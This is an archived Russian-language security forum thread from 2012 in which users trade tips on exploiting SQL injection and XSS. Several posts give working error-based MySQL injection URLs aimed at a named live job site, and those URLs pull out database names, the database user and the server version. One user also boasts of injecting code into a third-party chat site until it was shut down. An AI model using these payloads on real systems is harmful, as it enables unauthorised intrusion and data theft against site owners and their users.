HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21691  
Старый 20.11.2012, 00:19
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Creator000  
Creator000 said:
киньте, пожалуйста, ссылки. а wtb-программирование ведь нало знать да?
google.com
 
Ответить с цитированием

  #21692  
Старый 21.11.2012, 00:00
aadktnbaov
Guest
Сообщений: n/a
Провел на форуме:
2564

Репутация: 0
По умолчанию

Цитата:
Сообщение от Hapk  
Hapk said:
Подскажите плиз как можно раскрутить скулу
вот есть сайт
http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету
а вот когда подставляю слеш \ то выскакивает вот такая ошибка
Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106
Можно ли её раскрутить?
"раскрутили" ?

я знаю сайт с подобной "дырой"

( см. мой пост /showthread.php?p=3340983&posted=1#post3340983 )
 
Ответить с цитированием

  #21693  
Старый 21.11.2012, 00:22
Creator000
Guest
Сообщений: n/a
Провел на форуме:
9682

Репутация: 0
По умолчанию

ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?

ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?
 
Ответить с цитированием

  #21694  
Старый 21.11.2012, 01:33
Prosta4ok
Guest
Сообщений: n/a
Провел на форуме:
19438

Репутация: 0
По умолчанию

Цитата:
Сообщение от Creator000  
Creator000 said:
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?
ставь локальный сервер и тесть сколько влезет

Цитата:
Сообщение от Creator000  
Creator000 said:
Интересно, с помощью xss можно в текст вставить картинку?
можно сделать все что умеет JS
 
Ответить с цитированием

  #21695  
Старый 21.11.2012, 15:48
Creator000
Guest
Сообщений: n/a
Провел на форуме:
9682

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
ставь локальный сервер и тесть сколько влезет
а чат где мне взять?
 
Ответить с цитированием

  #21696  
Старый 21.11.2012, 16:20
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Creator000  
Creator000 said:
а чат где мне взять?
скачать денвер и усановить на комп
 
Ответить с цитированием

  #21697  
Старый 21.11.2012, 16:55
Prosta4ok
Guest
Сообщений: n/a
Провел на форуме:
19438

Репутация: 0
По умолчанию

Цитата:
Сообщение от Creator000  
Creator000 said:
а чат где мне взять?
все там же -> google.com
 
Ответить с цитированием

  #21698  
Старый 21.11.2012, 17:53
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent='

чёт немогу скулю разкрутиь((
 
Ответить с цитированием

  #21699  
Старый 21.11.2012, 21:11
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Код HTML:
HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+Group+by+11
Код HTML:
HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1%20AND%20%28SELECT%205534%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a666f733a,%28SELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS%20CHAR%29,0x20%29%29,1,50%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201,1%29,0x3a7172693a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29
ppcompany_zu
Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.

А привести в читабельный вид слабо ?

З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.
 
Ответить с цитированием

  #21700  
Старый 21.11.2012, 21:28
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.
А привести в читабельный вид слабо ?
З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.
BigBear так пойдет?

http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+ OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+ UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+conca t_ws(0x3a,user()),version(),database())),1,63)+,+ FLOOR(RAND(0)*2)))#

P.S: У меня браузер как то сам в урленкод кидает когда, капирую с адресной строки...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ